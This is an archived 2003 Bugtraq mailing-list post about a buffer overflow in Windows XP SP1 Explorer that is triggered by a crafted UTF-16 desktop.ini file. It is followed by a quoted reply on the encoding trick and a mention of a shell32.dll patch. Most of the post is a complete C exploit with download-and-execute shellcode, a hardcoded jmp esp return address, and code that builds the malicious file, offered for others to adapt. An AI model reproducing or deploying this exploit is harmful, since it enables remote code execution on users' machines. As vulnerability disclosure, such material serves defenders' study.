Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:4550
HistoryMay 18, 2003 - 12:00 a.m.

Re[2]: EXPLOIT: Buffer overflow in Explorer.exe on Windows XP SP1

2003-05-1800:00:00
vulners.com
17
JSON

hello bugtraq,

>From MSDN:
—cut—
DWORD GetPrivateProfileSection(
LPCTSTR lpAppName,
LPTSTR lpReturnedString,
DWORD nSize,
LPCTSTR lpFileName
);
[skip]
nSize
[in] Size of the buffer pointed to by the lpReturnedString parameter, in TCHARs.
Windows 95/98/Me: The maximum buffer size is 32,767 characters.
—cut—

It's a pity that even own Microsoft programmers do not know that for
the unicode version of the function TCHAR will turn into a WCHAR.
And we speak about using unicode everywhere…

Here is an exploit for Windows XP Service Pack 1.
NOTE: the FFFE header which can be easily created with notepad is not
a new technique. It has been already used for another vulnerability in
IE (see http://security.nnov.ru/search/news.asp?binid=1782).
NOTE: the directory "domain HELL team" has to be read-only, otherwise
it won't work.
NOTE: it's possible to exploit this bug using a network shared
resource. It looks strange, but that doesn't work for samba shares.
P.S. don't blame me i didn't use argv[] for parameters. it's your
task to modify the source…

#include <fstream.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <direct.h>

char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.
"\x81\xec\x40\x1f\x00\x00\xe8\x00\x00\x00\x00\x5d\x83\xed\x0b\xbf\x61\x57"
"\x7a\x74\xe8\x8c\x00\x00\x00\x89\xbd\x17\x01\x00\x00\xbf\x65\x1d\x22\x74"
"\xe8\x7c\x00\x00\x00\x89\xbd\x1b\x01\x00\x00\xbf\x17\x75\x79\x70\xe8\x6c"
"\x00\x00\x00\x89\xbd\x1f\x01\x00\x00\x8d\x85\x2c\x01\x00\x00\x50\x2e\xff"
"\x95\x17\x01\x00\x00\x8d\x9d\x33\x01\x00\x00\x53\x50\x2e\xff\x95\x1b\x01"
"\x00\x00\x6a\x00\x6a\x00\x8d\x8d\x4e\x01\x00\x00\x51\x8d\x8d\x5c\x01\x00"
"\x00\x51\x6a\x00\xff\xd0\x8d\x85\x23\x01\x00\x00\x50\x2e\xff\x95\x17\x01"
"\x00\x00\x8d\x9d\x46\x01\x00\x00\x53\x50\x2e\x8b\x9d\x1b\x01\x00\x00\xff"
"\xd3\x6a\x01\x8d\x8d\x4e\x01\x00\x00\x51\xff\xd0\x6a\x00\x2e\xff\x95\x1f"
"\x01\x00\x00\xbb\x3c\x00\x00\x01\x8b\x0b\x81\xc1\x04\x00\x00\x01\x8d\x41"
"\x14\x8b\x70\x68\x81\xc6\x00\x00\x00\x01\x8b\x06\x83\xf8\x00\x74\x51\x05"
"\x00\x00\x00\x01\x8b\x56\x10\x81\xc2\x00\x00\x00\x01\x8b\x18\x8b\xcb\x81"
"\xe1\x00\x00\x00\x80\x83\xf9\x00\x75\x2a\x81\xc3\x00\x00\x00\x01\x83\xc3"
"\x02\x33\xc9\x32\x0b\xc1\xc1\x08\x43\x80\x3b\x00\x75\xf5\x3b\xcf\x75\x04"
"\x8b\x3a\xeb\x16\x83\xc2\x04\x83\xc0\x04\x66\x83\x38\x00\x75\xc7\x83\xc6"
"\x14\x8b\x10\x83\xfa\x00\x74\xa8\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x00\x55\x52\x4c\x4d\x4f\x4e"
"\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65"
"\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x5c\x7e\x57\x52\x46\x35\x36\x33"
"\x34\x2e\x74\x6d\x70\x00";

char unicode_header[] = "\xFF\xFE";
char shell_header[] = "[.ShellClassInfo]\x0d\x0a";

#define OVERFLOW_LEN 0xA1C

void main()
{
char url[]="file://c:/winnt/system32/calc.exe";
// char url[]="http://localhost/cmd.exe&quot;;
char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)

char path[500];
strcpy(path,"domain HELL team");
mkdir(path);
SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
strcat(path,"\\desktop.ini");

ofstream out(path,ios::out+ios::binary);
out.write(unicode_header,sizeof(unicode_header)-1);
char zero = 0;
for (int i=0;i<strlen(shell_header);i++)
{
out.write(&shell_header[i],1);
out.write(&zero,1);
}
char pad = 'B';
for (i=0;i<OVERFLOW_LEN;i++) out.write(&pad,1);
char ebp[] = "1234";
out.write(ebp,4);

char pad0 = 1;

out.write(eip,4);

char pad2 = 'C';
for (i=0;i<12;i++) out.write(&pad,1);

out.write(shellcode,sizeof(shellcode)-1);
out.write(url,sizeof(url));

int len = sizeof(shellcode)-1+sizeof(url);
printf("shellcode+url: %d bytes\n",len);
if (len%2 == 1)
{
printf("it's odd, so add 1 extra byte");
out.write(&pad2,1);
}

out.close();

}

.einstein.
domain HELL team.

ES> Hi:

>> -----Original Message-----
>> From: nesumin [mailto:[email protected]]

>> I could create the exploit code on my Japanese Windows XP SP1.
>> Perhaps, I think you can easily create the full exploit code
>> by the following;
>>
>> * You can directly specify all overwritten data without thinking
>> the UNICODE conversion if you create the "desktop.ini" as "UTF-16".
>> (Adding BOM and encoding "[.ShellClassInfo]\x0d\x0a".)
>>
>> * You can get the code area of about 0xFF4 bytes.
>> (Before and after RET address)

ES> Obviously, I was playing in the ANSI world. Yes, I agree with you that the
ES> exploit code written in RTF-16 can be created with a size of about 0xFF4
ES> bytes. A piece of 0xFF4 bytes long exploit code can do a lot. So, my
ES> previous statement about limited exploitation of this buffer overflow is not
ES> accurate.

ES> It should be very easy to fix this bug. I manually modified the 800H to 400h
ES> in shell32.dll to fix it.

ES> Thanks a lot for your mention of BOM and UTF-16. Your concept is learnt and
ES> programmatically reproduced with GetPrivateProfileSectionW.

ES> Best regards

ES> Peter Huang

JSON